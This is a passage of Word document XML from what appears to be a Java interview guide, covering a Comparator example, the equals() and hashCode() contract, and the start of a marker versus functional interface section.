          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183596E6"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Student {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEAC6BD"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD7264C"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E52DD8" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1C713C"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udent(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24310CB9"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1EDDA"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE731A"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5227B0C" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D74397"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int getAge() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48D597"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6436E49C"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8ED1E19"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BA86E5D" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779EB1FC"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AgeComparator implements Comparator&lt;Student&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1F0656"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2742D966"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int compare(Student s1, Student s2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9AF4D2"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Integer.compare(s1.getAge(), s2.getAge()); // Returns the difference of ages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AF032B"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6194B29"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36522C2" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F35587"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4724E8D8"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6E058746"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udent s1 = new Student("Alice", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65237C58"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udent s2 = new Student("Bob", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6615CF" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705F77DE"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geComparator ageComparator = new AgeComparator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19867F67"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ageComparator.compare(s1, s2)); // Output will be a negative integer (-5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D260B8"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CD54591"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CDA9388" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485AA9AA" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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are(s1, s2) returns a negative integer because s1 (Alice) is younger than s2 (Bob).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76068856" w14:textId="4348EA26"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CFF9021">
          <v:rect id="_x0000_i1191" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7C89E" w14:textId="5C9DD6FD" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="0033685F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc196307544"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is contract in equals and hashcode method</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="4D7283B7" w14:textId="0737B8D3" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">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contract</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between the equals() and hashCode() methods in Java is defined by the Object class, and it's critical for ensuring the correct behavior of objects in hash-based collections like HashMap, HashSet, and Hashtable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D33EC75" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA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he equals() and hashCode() Contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C030A57" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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sistency between equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB06A2B" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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f two objects are considered equal according to the equals() method, they must have the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E5E729" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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means that if a.equals(b) returns true, then a.hashCode() must be equal to b.hashCode().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E1ED55" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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owever, two objects having the same hash code does not necessarily mean they are equal according to equals().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A9CC2" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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ifferent objects can have the same hash code (hash collisions), but they may not be considered equal by the equals() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CB83D" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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quals() Contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74B614" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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flexive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An object must be equal to itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547A06C4" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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equals(a) must return true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68625D73" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ymmetric</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a.equals(b) returns true, then b.equals(a) must also return true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7F339" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ransitive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a.equals(b) returns true and b.equals(c) returns true, then a.equals(c) must also return true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662AA181" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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sistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Repeated calls to a.equals(b) should consistently return the same result, as long as the objects are not modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C82BCDD" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ull comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: a.equals(null) should always return false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E942C73" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Code() Contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579FA29" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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sistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For any object, the hashCode() method must return the same integer value during the lifetime of the object, provided no fields used in equals() are modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137EF48D" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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f two objects are equal (i.e., a.equals(b) is true), they must have the same hash code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08789028" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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f two objects are not equal (i.e., a.equals(b) is false), it is not required for their hash codes to be different</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but it's highly recommended to minimize hash collisions to improve the performance of hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F53090" w14:textId="77777777" w:rsidR="00B45C47" w:rsidRPr="00CE4B95" w:rsidRDefault="00B45C47" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143EF439" w14:textId="1E693A7B" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA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4E2BF032"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Objects;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA7E91" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C63054"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38F470"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37063212"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBBE06" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5475ABB8"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Person(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41498CE2"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE882D"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB0A86"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BBFB144" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2400377A"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Implementing equals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375CF885"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04B6DED0"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boolean equals(Object obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E7287"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this == obj) return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CCA23F"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obj == null || getClass() != obj.getClass()) return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327938CF"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erson person = (Person) obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F852295"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age == person.age &amp;&amp; Objects.equals(name, person.name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C8F9C"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86E39A6" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A6774F"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Implementing hashCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C0203"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31263802"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int hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F7594"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Objects.hash(name, age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E61DD"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C4D56D8"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E09642D" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3954E5AB"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08FBAA5D"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39C37213"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erson p1 = new Person("John", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC16E6"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erson p2 = new Person("John", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770740C8"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C4D2094"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p1.equals(p2));  // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7CB91"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p1.hashCode() == p2.hashCode());  // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087978FC"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722FFF7" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA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4C264D8" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA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Breakdown of the Contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3A290" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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quality (equals())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A03DF6" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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 p1.equals(p2) returns true because both p1 and p2 have the same name and age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E75E36D" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 Code Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA2BD5E" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ce p1.equals(p2) is true, p1.hashCode() must be the same as p2.hashCode(), which is checked by the expression p1.hashCode() == p2.hashCode().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4780DB" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA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y is this contract important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B275D3A" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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based collections (like HashMap, HashSet)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rely on both equals() and hashCode() to efficiently locate objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703043B9" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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you don't follow the contract, it can cause unexpected behavior, such as objects being misplaced in a HashSet or HashMap, leading to bugs that are difficult to track down. For example, two objects that are considered equal according to equals() but have different hash codes could end up in separate buckets, violating the contract and potentially leading to inconsistent results when searching for or removing them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A2FF41" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thus, ensuring a correct implementation of both equals() and hashCode() is critical for using objects in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53549B01" w14:textId="7F8552E9"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C8182D8">
          <v:rect id="_x0000_i1192" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="662DEAC5" w14:textId="3DC83820" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="004B64D0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc196307545"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0012150D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between Marker interface and Functional interface</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="65C75573" w14:textId="56708368" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">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1. Marker Interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>marker interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface that does not contain any methods. It is used to mark or signal that a class possesses some special property or behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B26000F" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
